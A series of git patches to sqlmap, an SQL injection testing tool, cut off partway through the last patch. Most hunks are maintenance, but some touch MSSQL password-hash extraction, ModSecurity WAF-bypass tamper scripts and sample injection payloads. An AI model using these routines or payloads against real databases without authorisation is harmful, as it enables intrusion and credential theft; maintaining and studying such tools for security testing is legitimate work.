98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From de0df99d8e4585799af4e867ba3011a78e2448e5 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 28 Dec 2018 00:41:48 +0100 Subject: [PATCH 415/428] Update regarding #3418 (fallback for MsSQL's --passwords) --- lib/core/settings.py | 2 +- plugins/generic/users.py | 15 +++++++++++++++ txt/checksum.md5 | 4 ++-- 3 files changed, 18 insertions(+), 3 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 30de22c11d5..0db32382371 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.40" +VERSION = "1.2.12.41" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/plugins/generic/users.py b/plugins/generic/users.py index 742a8ec5c66..cbb2fa7917d 100644 --- a/plugins/generic/users.py +++ b/plugins/generic/users.py @@ -201,6 +201,9 @@ def getPasswordHashes(self): else: values = inject.getValue(query, blind=False, time=False) + if isNoneValue(values) and Backend.isDbms(DBMS.MSSQL): + values = inject.getValue(query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr"), blind=False, time=False) + for user, password in filterPairValues(values): if not user or user == " ": continue @@ -213,6 +216,8 @@ def getPasswordHashes(self): kb.data.cachedUsersPasswords[user].append(password) if not kb.data.cachedUsersPasswords and isInferenceAvailable() and not conf.direct: + fallback = False + if not len(users): users = self.getUsers() @@ -263,6 +268,10 @@ def getPasswordHashes(self): count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + if not isNumPosStrValue(count) and Backend.isDbms(DBMS.MSSQL): + fallback = True + count = inject.getValue(query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr"), union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) + if not isNumPosStrValue(count): warnMsg = "unable to retrieve the number of password " warnMsg += "hashes for user '%s'" % user @@ -283,10 +292,16 @@ def getPasswordHashes(self): query = rootQuery.blind.query2 % (user, index, user) else: query = rootQuery.blind.query % (user, index, user) + + if fallback: + query = query.replace("master.dbo.fn_varbintohexstr", "sys.fn_sqlvarbasetostr") + elif Backend.isDbms(DBMS.INFORMIX): query = rootQuery.blind.query % (user,) + elif Backend.isDbms(DBMS.HSQLDB): query = rootQuery.blind.query % (index, user) + else: query = rootQuery.blind.query % (user, index) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index e96e0f067a6..050d29f933e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -03f706e4caefe69887515d9e7cb56748 lib/core/settings.py +eb8b62b1dc94be51a6c3d44d47af8f4a lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -223,7 +223,7 @@ f7874230e5661910d5fd21544c7d1022 plugins/generic/misc.py 30b421f06dc98998ddc1923a9048b7fc plugins/generic/search.py a70cc0ada4b0cc9e7df23cb6d48a4a0c plugins/generic/syntax.py f990d799e578dfbc3cde5728655a7854 plugins/generic/takeover.py -1265241e309da72bb82c3863a4c1b4bd plugins/generic/users.py +8ab0b84fda105459913715b98e1b8a4a plugins/generic/users.py 1e5532ede194ac9c083891c2f02bca93 plugins/__init__.py 5dc693e22f5d020c5c568d7325bd4226 shell/backdoors/backdoor.asp_ 158bfa168128393dde8d6ed11fe9a1b8 shell/backdoors/backdoor.aspx_ From 83972d405fe70ff40f562b59f7bf3e51e94d1164 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 28 Dec 2018 17:54:58 +0100 Subject: [PATCH 416/428] Trivial text update --- .github/ISSUE_TEMPLATE.md | 2 +- lib/core/settings.py | 2 +- sqlmap.conf | 6 +++--- tamper/modsecurityversioned.py | 2 +- tamper/modsecurityzeroversioned.py | 2 +- txt/checksum.md5 | 6 +++--- 6 files changed, 10 insertions(+), 10 deletions(-) diff --git a/.github/ISSUE_TEMPLATE.md b/.github/ISSUE_TEMPLATE.md index 062912bd61c..cf4ea5111ad 100644 --- a/.github/ISSUE_TEMPLATE.md +++ b/.github/ISSUE_TEMPLATE.md @@ -19,7 +19,7 @@ * Client OS (e.g. `Microsoft Windows 10`) * Program version (`python sqlmap.py --version` or `sqlmap --version` depending on installation): * Target DBMS (e.g. `Microsoft SQL Server`): -* Detected WAF/IDS/IPS protection (e.g. `ModSecurity` or `unknown`): +* Detected WAF/IPS protection (e.g. `ModSecurity` or `unknown`): * SQLi techniques found by sqlmap (e.g. `error-based` and `boolean-based blind`): * Results of manual target assessment (e.g. found that the payload `query=test' AND 4113 IN ((SELECT 'foobar'))-- qKLV` works): * Relevant console output (if any): diff --git a/lib/core/settings.py b/lib/core/settings.py index 0db32382371..4b7d67dc94b 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.41" +VERSION = "1.2.12.42" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/sqlmap.conf b/sqlmap.conf index 5dfc3d72d01..88bcd002c9d 100644 --- a/sqlmap.conf +++ b/sqlmap.conf @@ -753,7 +753,7 @@ answers = # Valid: True or False beep = False -# Offline WAF/IPS/IDS payload detection testing. +# Offline WAF/IPS payload detection testing. # Valid: True or False checkPayload = False @@ -774,7 +774,7 @@ disableColoring = False # Default: 1 googlePage = 1 -# Make a thorough testing for a WAF/IPS/IDS protection. +# Make a thorough testing for a WAF/IPS protection. # Valid: True or False identifyWaf = False @@ -790,7 +790,7 @@ mobile = False # Valid: True or False offline = False -# Skip heuristic detection of WAF/IPS/IDS protection. +# Skip heuristic detection of WAF/IPS protection. # Valid: True or False skipWaf = False diff --git a/tamper/modsecurityversioned.py b/tamper/modsecurityversioned.py index 0f8435598f6..7a6c6569724 100644 --- a/tamper/modsecurityversioned.py +++ b/tamper/modsecurityversioned.py @@ -28,7 +28,7 @@ def tamper(payload, **kwargs): * MySQL 5.0 Notes: - * Useful to bypass ModSecurity WAF/IDS + * Useful to bypass ModSecurity WAF >>> import random >>> random.seed(0) diff --git a/tamper/modsecurityzeroversioned.py b/tamper/modsecurityzeroversioned.py index cb54fc8ff47..f87b8a098b9 100644 --- a/tamper/modsecurityzeroversioned.py +++ b/tamper/modsecurityzeroversioned.py @@ -27,7 +27,7 @@ def tamper(payload, **kwargs): * MySQL 5.0 Notes: - * Useful to bypass ModSecurity WAF/IDS + * Useful to bypass ModSecurity WAF >>> tamper('1 AND 2>1--') '1 /*!00000AND 2>1*/--' diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 050d29f933e..8540c7d5ab3 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -eb8b62b1dc94be51a6c3d44d47af8f4a lib/core/settings.py +6781c2fdbfdac0ec5388ca9f06b89b64 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -262,8 +262,8 @@ ef0639557a79e57b06296c4bc223ebef tamper/htmlencode.py 2dc49bcd6c55f4e2322b07fa92685356 tamper/least.py 40d1ea0796fd91cb3cdd602e36daed15 tamper/lowercase.py a54b361da0ac6988d0b97bc79463615d tamper/luanginx.py -1c4d622d1c2c77fc3db1f8b3849467ee tamper/modsecurityversioned.py -f177a624c2cd3431c433769c6eb995e7 tamper/modsecurityzeroversioned.py +82b85a9325ffc22a9fe4003e12c5bc4a tamper/modsecurityversioned.py +0e0f17db797e61f778141a804ab6cd0d tamper/modsecurityzeroversioned.py 91b63afdb96b1d51c12a14cbd425d310 tamper/multiplespaces.py dcf3458f9010ca41bc4b56804f15792c tamper/overlongutf8more.py a3a3cef042b864c4226b63f89548f939 tamper/overlongutf8.py From 8092551fa9c0dc8c78cf6051add564300a9146a7 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 28 Dec 2018 18:22:44 +0100 Subject: [PATCH 417/428] Minor refactoring --- lib/core/common.py | 22 +++++++++++----------- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 14 insertions(+), 14 deletions(-) diff --git a/lib/core/common.py b/lib/core/common.py index 6291297c77b..502e60fca36 100644 --- a/lib/core/common.py +++ b/lib/core/common.py @@ -2121,6 +2121,16 @@ def readXmlFile(xmlFile): return retVal +def average(values): + """ + Computes the arithmetic mean of a list of numbers. + + >>> average([0.9, 0.9, 0.9, 1.0, 0.8, 0.9]) + 0.9 + """ + + return (sum(values) / len(values)) if values else None + @cachedmethod def stdev(values): """ @@ -2135,19 +2145,9 @@ def stdev(values): return None else: avg = average(values) - _ = reduce(lambda x, y: x + pow((y or 0) - avg, 2), values, 0.0) + _ = 1.0 * sum(pow((_ or 0) - avg, 2) for _ in values) return sqrt(_ / (len(values) - 1)) -def average(values): - """ - Computes the arithmetic mean of a list of numbers. - - >>> average([0.9, 0.9, 0.9, 1.0, 0.8, 0.9]) - 0.9 - """ - - return (sum(values) / len(values)) if values else None - def calculateDeltaSeconds(start): """ Returns elapsed time from start till now diff --git a/lib/core/settings.py b/lib/core/settings.py index 4b7d67dc94b..2aea222710e 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.42" +VERSION = "1.2.12.43" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 8540c7d5ab3..330e65059de 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -29,7 +29,7 @@ d4582467b0735525d8d8bdc0396ec87f lib/controller/checks.py 1e5532ede194ac9c083891c2f02bca93 lib/controller/__init__.py e62309b22a59e60b270e62586f169441 lib/core/agent.py c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py -22eb6444f89ef013cd256c92771cff5a lib/core/common.py +7272b591e710224c578071381e28c6c5 lib/core/common.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -6781c2fdbfdac0ec5388ca9f06b89b64 lib/core/settings.py +2e1f9bb9dce79f8681b8e1c83591d346 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py From a569f21ad721aa6613b62d4e7a35aaf6f8c0fc1a Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 28 Dec 2018 18:25:56 +0100 Subject: [PATCH 418/428] Bug fix (--smoke hasn't tested wrapped functions) --- lib/core/decorators.py | 7 +++++++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 10 insertions(+), 3 deletions(-) diff --git a/lib/core/decorators.py b/lib/core/decorators.py index 0dfdbdaa3ec..ae3635ca603 100644 --- a/lib/core/decorators.py +++ b/lib/core/decorators.py @@ -5,6 +5,7 @@ See the file 'LICENSE' for copying permission """ +import functools import hashlib from lib.core.threads import getCurrentThreadData @@ -16,6 +17,7 @@ def cachedmethod(f, cache={}): Reference: http://code.activestate.com/recipes/325205-cache-decorator-in-python-24/ """ + @functools.wraps(f) def _(*args, **kwargs): key = int(hashlib.md5("|".join(str(_) for _ in (f, args, kwargs))).hexdigest(), 16) & 0x7fffffffffffffff if key not in cache: @@ -26,6 +28,11 @@ def _(*args, **kwargs): return _ def stackedmethod(f): + """ + Method using pushValue/popValue functions (fallback function for stack realignment) + """ + + @functools.wraps(f) def _(*args, **kwargs): threadData = getCurrentThreadData() originalLevel = len(threadData.valueStack) diff --git a/lib/core/settings.py b/lib/core/settings.py index 2aea222710e..5aa9f9800f8 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.43" +VERSION = "1.2.12.44" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 330e65059de..0c1c5975a5e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -33,7 +33,7 @@ c347f085bd561adfa26d3a9512e5f3b9 lib/core/bigarray.py 0d082da16c388b3445e656e0760fb582 lib/core/convert.py 9f87391b6a3395f7f50830b391264f27 lib/core/data.py 72016ea5c994a711a262fd64572a0fcd lib/core/datatype.py -4086fb55f42e27de5330505605baad0f lib/core/decorators.py +2e62f7c5e89442e5a76e6d797d54be2c lib/core/decorators.py fbb55cc6100318ff922957b6577dc58f lib/core/defaults.py ac7c070b2726d39fbac1916b1a5f92b2 lib/core/dicts.py 760de985e09f5d11aacd3a8f2d8e9ff2 lib/core/dump.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -2e1f9bb9dce79f8681b8e1c83591d346 lib/core/settings.py +659309102048735a13747b78c300120e lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py From b31c264a590afa60bf6ce03a34048949aab8649c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 28 Dec 2018 20:49:40 +0100 Subject: [PATCH 419/428] Minor update --- extra/wafdetectify/wafdetectify.py | 4 +++- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 6 insertions(+), 4 deletions(-) diff --git a/extra/wafdetectify/wafdetectify.py b/extra/wafdetectify/wafdetectify.py index 68cdcb93bdf..014854d52cd 100644 --- a/extra/wafdetectify/wafdetectify.py +++ b/extra/wafdetectify/wafdetectify.py @@ -99,7 +99,7 @@ def main(): WAF_FUNCTIONS = sorted(WAF_FUNCTIONS, key=lambda _: "generic" in _[1].lower()) - print colorize("[i] %d WAF scripts loaded" % len(WAF_FUNCTIONS)) + print colorize("[i] checking '%s'..." % sys.argv[1]) found = False for function, product in WAF_FUNCTIONS: @@ -115,5 +115,7 @@ def main(): print + exit(int(not found)) + if __name__ == "__main__": main() diff --git a/lib/core/settings.py b/lib/core/settings.py index 5aa9f9800f8..ec01862c0ac 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.44" +VERSION = "1.2.12.45" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 0c1c5975a5e..fd86248a9f4 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -21,7 +21,7 @@ e4805169a081b834ca51a60a150c7247 extra/shutils/newlines.py 1e5532ede194ac9c083891c2f02bca93 extra/sqlharvest/__init__.py b3e60ea4e18a65c48515d04aab28ff68 extra/sqlharvest/sqlharvest.py 1e5532ede194ac9c083891c2f02bca93 extra/wafdetectify/__init__.py -c1bccc94522d3425a372dcd57f78418e extra/wafdetectify/wafdetectify.py +d2fe1ac374de3c2d7729152cb8c80ce8 extra/wafdetectify/wafdetectify.py 3459c562a6abb9b4bdcc36925f751f3e lib/controller/action.py d4582467b0735525d8d8bdc0396ec87f lib/controller/checks.py 197bdf07f8ea15ecc7e0dafea4f9ae2f lib/controller/controller.py @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -659309102048735a13747b78c300120e lib/core/settings.py +bcd013acb00d49bb4ed6a39e3e4672d0 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py From c799e794f2a9ad00216a879451f66d13de521894 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Sat, 29 Dec 2018 20:40:49 +0100 Subject: [PATCH 420/428] Minor update of modsecurity.py --- lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- waf/modsecurity.py | 2 +- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index ec01862c0ac..6f8e40035fd 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.45" +VERSION = "1.2.12.46" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index fd86248a9f4..c52676689b0 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -bcd013acb00d49bb4ed6a39e3e4672d0 lib/core/settings.py +7230ffa8fb85a6cd1234850be5bd2a1a lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -433,7 +433,7 @@ ade1299c435db7b9e35cf1166ed9d859 waf/generic.py 5a5c9452b9779bf39c208ebe26c98fdb waf/jiasule.py 898f53c12133da3e946301f4aa97d538 waf/knownsec.py 15a50edd48961ea168648a370f42e123 waf/kona.py -b17a154fe7959619eaafffa60e14199f waf/modsecurity.py +69cadf95303d60ac0a228cf60dfdba73 waf/modsecurity.py d09a50713daf3c0a2594ed4f50c57adb waf/naxsi.py bf573d01d56e585f4ad57132bc594934 waf/netcontinuum.py cb2f1516867684042f580e02138463de waf/netscaler.py diff --git a/waf/modsecurity.py b/waf/modsecurity.py index 6b13043ef10..64d36264177 100644 --- a/waf/modsecurity.py +++ b/waf/modsecurity.py @@ -18,7 +18,7 @@ def detect(get_page): for vector in WAF_ATTACK_VECTORS: page, headers, code = get_page(get=vector) retval = re.search(r"Mod_Security|NOYB", headers.get(HTTP_HEADER.SERVER, ""), re.I) is not None - retval |= any(_ in (page or "") for _ in ("This error was generated by Mod_Security", "One or more things in your request were suspicious", "rules of the mod_security module")) + retval |= any(_ in (page or "") for _ in ("This error was generated by Mod_Security", "One or more things in your request were suspicious", "rules of the mod_security module", "The page you are trying to access is restricted due to a security rule")) if retval: break From 586c461ae6b80730376cf71688127bdce44fafdf Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 31 Dec 2018 01:01:19 +0100 Subject: [PATCH 421/428] Minor patch --- lib/core/settings.py | 2 +- lib/request/connect.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 4 insertions(+), 4 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 6f8e40035fd..25419dd590d 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.46" +VERSION = "1.2.12.47" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index 967c5916291..e9e0899ad39 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -1266,7 +1266,7 @@ def _randomizeParameter(paramString, randomParameter): finally: kb.pageCompress = popValue() - if not pageLength: + if pageLength is None: try: page, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, response=response, raise404=raise404, ignoreTimeout=timeBasedCompare) except MemoryError: diff --git a/txt/checksum.md5 b/txt/checksum.md5 index c52676689b0..8452b99385c 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -7230ffa8fb85a6cd1234850be5bd2a1a lib/core/settings.py +22ef53fbda55651f76cb0e3f867ce6bc lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 67c035eda3066b44c592b2f602e44b3e lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -bd5e2ad9dd0505bdaae180b323a8fa34 lib/request/connect.py +b003a50d7de068afbe540e830df8682d lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From e18b41fc82ce99ab3dd1155a7da5467ab710c371 Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 31 Dec 2018 01:03:40 +0100 Subject: [PATCH 422/428] Fixes #3421 --- lib/core/settings.py | 2 +- lib/request/connect.py | 11 +++++++---- txt/checksum.md5 | 4 ++-- 3 files changed, 10 insertions(+), 7 deletions(-) diff --git a/lib/core/settings.py b/lib/core/settings.py index 25419dd590d..1ea425df99a 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.47" +VERSION = "1.2.12.48" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/lib/request/connect.py b/lib/request/connect.py index e9e0899ad39..eac8a2c8581 100644 --- a/lib/request/connect.py +++ b/lib/request/connect.py @@ -1259,10 +1259,13 @@ def _randomizeParameter(paramString, randomParameter): _, headers, code = Connect.getPage(url=uri, get=get, post=post, method=method, cookie=cookie, ua=ua, referer=referer, host=host, silent=silent, auxHeaders=auxHeaders, raise404=raise404, skipRead=(kb.nullConnection == NULLCONNECTION.SKIP_READ)) if headers: - if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and headers.get(HTTP_HEADER.CONTENT_LENGTH): - pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH]) - elif kb.nullConnection == NULLCONNECTION.RANGE and headers.get(HTTP_HEADER.CONTENT_RANGE): - pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:]) + try: + if kb.nullConnection in (NULLCONNECTION.HEAD, NULLCONNECTION.SKIP_READ) and headers.get(HTTP_HEADER.CONTENT_LENGTH): + pageLength = int(headers[HTTP_HEADER.CONTENT_LENGTH].split(',')[0]) + elif kb.nullConnection == NULLCONNECTION.RANGE and headers.get(HTTP_HEADER.CONTENT_RANGE): + pageLength = int(headers[HTTP_HEADER.CONTENT_RANGE][headers[HTTP_HEADER.CONTENT_RANGE].find('/') + 1:]) + except ValueError: + pass finally: kb.pageCompress = popValue() diff --git a/txt/checksum.md5 b/txt/checksum.md5 index 8452b99385c..d68daa63235 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -22ef53fbda55651f76cb0e3f867ce6bc lib/core/settings.py +ee218563ec023478311e55a30e2ea443 lib/core/settings.py a971ce157d04de96ba6e710d3d38a9a8 lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 1581be48127a3a7a9fd703359b6e7567 lib/core/target.py @@ -71,7 +71,7 @@ f6b5957bf2103c3999891e4f45180bce lib/parse/payloads.py 30eed3a92a04ed2c29770e1b10d39dc0 lib/request/basicauthhandler.py 67c035eda3066b44c592b2f602e44b3e lib/request/basic.py 859b6ad583e0ffba154f17ee179b5b89 lib/request/comparison.py -b003a50d7de068afbe540e830df8682d lib/request/connect.py +2fe9e5118553f9b2b37ca33d5f85a401 lib/request/connect.py dd4598675027fae99f2e2475b05986da lib/request/direct.py 2044fce3f4ffa268fcfaaf63241b1e64 lib/request/dns.py 98535d0efca5551e712fcc4b34a3f772 lib/request/httpshandler.py From 45d0010323a1ff4ee3c21de59f4e8ab3972cdf2c Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Mon, 31 Dec 2018 01:20:43 +0100 Subject: [PATCH 423/428] Most probably solves #3422 --- lib/core/option.py | 4 ++++ lib/core/settings.py | 2 +- txt/checksum.md5 | 4 ++-- 3 files changed, 7 insertions(+), 3 deletions(-) diff --git a/lib/core/option.py b/lib/core/option.py index 23dce9cba4e..85fcd3806fe 100644 --- a/lib/core/option.py +++ b/lib/core/option.py @@ -2271,6 +2271,10 @@ def _basicOptionValidation(): errMsg = "option '-d' is incompatible with option '-u' ('--url')" raise SqlmapSyntaxException(errMsg) + if conf.direct and conf.dbms: + errMsg = "option '-d' is incompatible with option '--dbms'" + raise SqlmapSyntaxException(errMsg) + if conf.identifyWaf and conf.skipWaf: errMsg = "switch '--identify-waf' is incompatible with switch '--skip-waf'" raise SqlmapSyntaxException(errMsg) diff --git a/lib/core/settings.py b/lib/core/settings.py index 1ea425df99a..ce19e72a6bd 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.12.48" +VERSION = "1.2.12.49" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/txt/checksum.md5 b/txt/checksum.md5 index d68daa63235..6e7ab0bcb8e 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 @@ -42,14 +42,14 